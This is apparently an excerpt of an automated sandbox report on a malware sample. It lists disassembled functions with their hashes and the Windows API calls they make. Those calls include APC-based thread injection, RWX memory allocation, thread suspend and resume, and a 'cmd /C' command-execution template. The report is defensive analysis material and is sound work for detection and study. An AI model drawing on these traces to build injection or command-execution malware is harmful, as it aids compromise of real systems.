  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
